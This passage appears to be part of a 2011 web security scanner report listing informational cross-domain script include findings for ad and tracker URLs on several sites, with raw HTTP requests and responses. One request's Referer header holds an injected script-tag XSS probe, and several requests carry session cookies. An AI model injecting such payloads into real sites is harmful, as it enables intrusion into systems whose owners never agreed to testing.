Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:26:20 GMT
Server: cafe
Cache-Control: private
Content-Length: 2182
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:26:20 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/14302-119028-2056-12?mpt=1182167233&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBC8CY3PP1TbqHGMPilQeay8nGCdaooYACzvj7-xiemNXWTMDqkgMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaARdodHRwOi8vd3d3LnR3YWNrbGUuY29tL-ABArgCGMACBcgC6JrhCqgDAdED4Mvbl_AJCmHoA4gC6AO1COgD6QfoA7oI6AOCAvUDAAAAxA%2526num%253D1%2526sig%253DAGiWqtyesmEogo7AuhIHfueUHf6RZzcr2w%2526client%253Dca-pub-7494156027018342%2526adurl%253D">
</script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.40. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQAGYE3dcKYhH_ayDGovBdy_Y-vVNAAAAAIwuAAC1AAAAlgIAAAIAAACMcAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gANAYBAgUCAQQAAAAABR5FZQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+18582%2C+1307966168%29%3Buf%28%27c%27%2C+84055%2C+1307966168%29%3Buf%28%27r%27%2C+422028%2C+1307966168%29%3B&cnd=!uBwF1AjXkAUQjOEZGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABAIgBAJABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!3ASnJwjXkAUQjOEZGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX62AABC20K5XFIkvFx4HE2g1niV-6tbeun4A&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjqR22Pr1Te2WBMjilQfg48WXCdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAL4BcACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAbFraj6l4H1vDQ%26num%3D1%26sig%3DAGiWqtzg1K0ys-dZ_vtnOBuByoLCRz8ULQ%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.41. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQDkE_s-NtOkJ_ayDGovBdy9f8vVNAAAAAIwuAAC1AAAANQEAAAIAAABrowUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gA-hABAgUCAQQAAAAAyR-C1AAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307963999%29%3Buf%28%27r%27%2C+369515%2C+1307963999%29%3Bppv%2811776%2C+%27714300537087853625%27%2C+1307963999%2C+1310555999%2C+62058%2C+25553%29%3B&cnd=!IR4JVAjq5AMQ68YWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcAB4AIABpAGIAQKQAQGYAQGgAQOoAQOwAQG5AZmZmQXXIxNAwQGZmZkF1yMTQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!ggXiLgjq5AMQ68YWGNHHASAA&referrer=http://www.twackle.com/&pp=TfXyXgAOT28K5QPjiiFNjs7-DqP7CU-xAYe2AQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRoCOXvL1Te-eOeOHlAeOm4XRCO_675oCr5z7xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQysgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEXaHR0cDovL3d3dy50d2Fja2xlLmNvbS-YAvokwAIEyAKrgqUOqAMB6AOIAugDtQjoA-kH6AO6COgDggL1AwAAAMCABvSgy_KoovzeXw%26num%3D1%26sig%3DAGiWqtyXZgXhqAnfCxu9xhZ_afwDZNBT3A%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.42. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQBFGbOqw3hcx_ayDGovBdy9w_vVNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAUg8BAgUCAQQAAAAABx_FrQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307967088%29%3Buf%28%27r%27%2C+390217%2C+1307967088%29%3B&cnd=!hB1XGwjc3gQQyegXGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBogBMpABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!cAXULQjc3gQQyegXGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX-cAAFiLQK5XIkjoR6cIbWCXQFUCP72fmCbQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzfsIcP71TbSRFqTklQfw9JH0CNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCrBvAAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtz18dcVukCne8BIIe7MY6bdHGvlJQ%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 12:11:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 1618
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 12:11:28 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQBFGbOqw3hcx_ayDGovBdy9w_vVNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAUg8BAgUCAQQAAAAABx_FrQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307967088%29%3Buf%28%27r%27%2C+390217%2C+1307967088%29%3B&cnd=!hB1XGwjc3gQQyegXGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBogBMpABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!cAXULQjc3gQQyegXGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX-cAAFiLQK5XIkjoR6cIbWCXQFUCP72fmCbQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzfsIcP71TbSRFqTklQfw9JH0CNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCrBvAAgTIAoXSzwqoAwHoA4gC6AO1CPUDAAAAwIAG0bGZmoqTjeRB%26num%3D1%26sig%3DAGiWqtz18dcVukCne8BIIe7MY6bdHGvlJQ%26client%3Dca-pub-7494156027018342%26adurl%3D"></script>
...[SNIP]...

19.43. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://altfarm.mediaplex.com/ad/js/14302-119028-2056-13?mpt=1367093073&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBW9kOpf_1TfuoBIz8lQfWy_CtCNaooYACvvr7-xiemNXWTPDUlAMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AEDuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE%2526num%253D1%2526sig%253DAGiWqtynvhOcQ9qzIiL5G8UK6GZUkwSkbA%2526client%253Dca-pub-7494156027018342%2526adurl%253D
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

19.44. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=hetRuB6FCUCF61G4HoUJQAAAAKCZmQFAhetRuB6FCUCF61G4HoUJQGQMRy2By9Rn_ayDGovBdy8X8_VNAAAAAEUhAAC1AAAANQEAAAIAAABmowUA0WMAAAEAAABVU0QAVVNEANQBPADPCmYAzg4BAgUCAQQAAAAAQCJJ8wAAAAA.&tt_code=vert-22&udj=uf%28%27a%27%2C+15288%2C+1307964183%29%3Buf%28%27r%27%2C+369510%2C+1307964183%29%3Bppv%2811776%2C+%277481828636640087140%27%2C+1307964183%2C+1310556183%2C+62058%2C+25553%29%3B&cnd=!8x6Kdgjq5AMQ5sYWGAAg0ccBMAA4zxVAAEi1AlAAWABgVWgAcAB4AIABqAGIAQSQAQGYAQGgAQOoAQOwAQG5AZmZmcEehQlAwQGZmZnBHoUJQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!fQW1Lgjq5AMQ5sYWGNHHASAA&referrer=http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/&pp=TfXzFwAHvNIK5WhLn1JwNrEb3Vc0Mn7hd51A_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBHBubF_P1TdL5HsvQlQe24Mn6Ce_675oCp537xBqL-vP9CAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05Mjk5MTA3MzkwMjg3NjkysgERd3d3LnR2ZmFuYXRpYy5jb226AQk0Njh4NjBfYXPIAQnaAT9odHRwOi8vd3d3LnR2ZmFuYXRpYy5jb20vMjAxMS8wNi9nYW1lLW9mLXRocm9uZXMtcmV2aWV3LWJhZWxvci-YAqoGwAIEyAKrgqUOqAMB6AMW6AOkBfUDAAAARIAGwIvsgYexoIw1%26num%3D1%26sig%3DAGiWqtyqO1BpEtqHjULBlEfkHiwLMq6NTQ%26client%3Dca-pub-9299107390287692%26adurl%3D

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:23:03 GMT
Server: cafe
Cache-Control: private
Content-Length: 1804
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:23:03 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=hetRuB6FCUCF61G4HoUJQAAAAKCZmQFAhetRuB6FCUCF61G4HoUJQGQMRy2By9Rn_ayDGovBdy8X8_VNAAAAAEUhAAC1AAAANQEAAAIAAABmowUA0WMAAAEAAABVU0QAVVNEANQBPADPCmYAzg4BAgUCAQQAAAAAQCJJ8wAAAAA.&tt_code=vert-22&udj=uf%28%27a%27%2C+15288%2C+1307964183%29%3Buf%28%27r%27%2C+369510%2C+1307964183%29%3Bppv%2811776%2C+%277481828636640087140%27%2C+1307964183%2C+1310556183%2C+62058%2C+25553%29%3B&cnd=!8x6Kdgjq5AMQ5sYWGAAg0ccBMAA4zxVAAEi1AlAAWABgVWgAcAB4AIABqAGIAQSQAQGYAQGgAQOoAQOwAQG5AZmZmcEehQlAwQGZmZnBHoUJQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!fQW1Lgjq5AMQ5sYWGNHHASAA&referrer=http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/&pp=TfXzFwAHvNIK5WhLn1JwNrEb3Vc0Mn7hd51A_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBHBubF_P1TdL5HsvQlQe24Mn6Ce_675oCp537xBqL-vP9CAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05Mjk5MTA3MzkwMjg3NjkysgERd3d3LnR2ZmFuYXRpYy5jb226AQk0Njh4NjBfYXPIAQnaAT9odHRwOi8vd3d3LnR2ZmFuYXRpYy5jb20vMjAxMS8wNi9nYW1lLW9mLXRocm9uZXMtcmV2aWV3LWJhZWxvci-YAqoGwAIEyAKrgqUOqAMB6AMW6AOkBfUDAAAARIAGwIvsgYexoIw1%26num%3D1%26sig%3DAGiWqtyqO1BpEtqHjULBlEfkHiwLMq6NTQ%26client%3Dca-pub-9299107390287692%26adurl%3D"></script>
...[SNIP]...

19.45. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://altfarm.mediaplex.com/ad/js/14302-119028-2056-13?mpt=116368343&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBsgDu3AD2Tfi6PKfMsQfX45SBDNaooYACvvr7-xiemNXWTICFnwMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADA%2526num%253D1%2526sig%253DAGiWqtxCM8gNeEVgTFGRkHDrV3gpF4chqg%2526client%253Dca-pub-7494156027018342%2526adurl%253D
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 12:21:49 GMT
Server: cafe
Cache-Control: private
Content-Length: 2179
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 12:21:49 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/14302-119028-2056-13?mpt=116368343&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBsgDu3AD2Tfi6PKfMsQfX45SBDNaooYACvvr7-xiemNXWTICFnwMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADA%2526num%253D1%2526sig%253DAGiWqtxCM8gNeEVgTFGRkHDrV3gpF4chqg%2526client%253Dca-pub-7494156027018342%2526adurl%253D">
</script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.46. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMbCAQVosTYM_ayDGovBdy-i8_VNAAAAAIwuAAC1AAAAlgIAAAIAAABI1QYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gA1xABAgUCAQQAAAAACB-akAAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17892%2C+1307964322%29%3Buf%28%27c%27%2C+89145%2C+1307964322%29%3Buf%28%27r%27%2C+447816%2C+1307964322%29%3B&cnd=!yRy62gi5uAUQyKobGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABAIgBAJABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!7QRzKAi5uAUQyKobGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfXzogALBokK5XaLns835z3qoL_VahW9PFeZfA&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmcz2ovP1TYmNLIvtlQfn77z2Cdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAaKnKHz3tiP7BA%26num%3D1%26sig%3DAGiWqtzdPTl7nHPOyy0L0zrT-TotQBtEWw%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

Response

19.47. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The response dynamically includes the following script from another domain:

http://ev.ib-ibi.com/image.sbix?go=2269&pid=32&xid=3420415245200633085

Request

Response

19.48. http://idolator.com/ifb/audience-science.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idolator.com
Path:	/ifb/audience-science.html

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=D10898&auto=t

Request

GET /ifb/audience-science.html HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:32:49 GMT
Server: nginx/0.7.64
Content-Type: text/html
Last-Modified: Wed, 28 Jul 2010 18:49:39 GMT
Expires: Mon, 13 Jun 2011 11:32:49 GMT
Cache-Control: max-age=0
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<body>
<script src="http://js.revsci.net/gateway/gw.js?csid=D10898&auto=t"></script>
...[SNIP]...

19.49. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js

Request

GET /wp-content/plugins/wp-facebookconnect/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:32:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: max-age=225065900
Expires:
Pragma:
Vary: Accept-Encoding
Content-Length: 607
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>cross domain receiver p
...[SNIP]...
XD) receiver page. It needs to be placed on your domain so that the Javascript
library can communicate within the iframe permission model. Put it here:

http://www.example.com/xd_receiver.php
-->
<script
src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js"
type="text/javascript"></script>
...[SNIP]...

19.50. http://kotaku.com/static/ad_iframe.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/ad_iframe.php

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/gm.kotaku/pc;ptile=9;sz=300x250;ord=45018742;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?

Request

GET /static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; usrev=43127; ganjaPostlistView=false; __qca=P0-1910528491-1307963900267; ____GSV=dynamic; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; ad_url_login=0; ad_url_commenter=0; ad_url_star=0; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; welcome-box_count=1; interstitial_count=1; __utmz=153847911.1307963900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153847911.155554980.1307963900.1307963900.1307963900.1; __utmc=153847911; __utmb=153847911.1.10.1307963900; __g_iut=1307963904980; _chartbeat2=e1yns63z64wh592f

Response

19.51. http://kotaku.com/static/ad_iframe.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/ad_iframe.php

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/gm.kotaku/pc;ptile=10;sz=640x360;ord=56598520;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?

Request

Response

19.52. http://kotaku.com/static/items/kotaku.com/trackers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/items/kotaku.com/trackers.html

Issue detail

The response dynamically includes the following script from another domain:

http://secure-au.imrworldwide.com/v60.js

Request

GET /static/items/kotaku.com/trackers.html HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
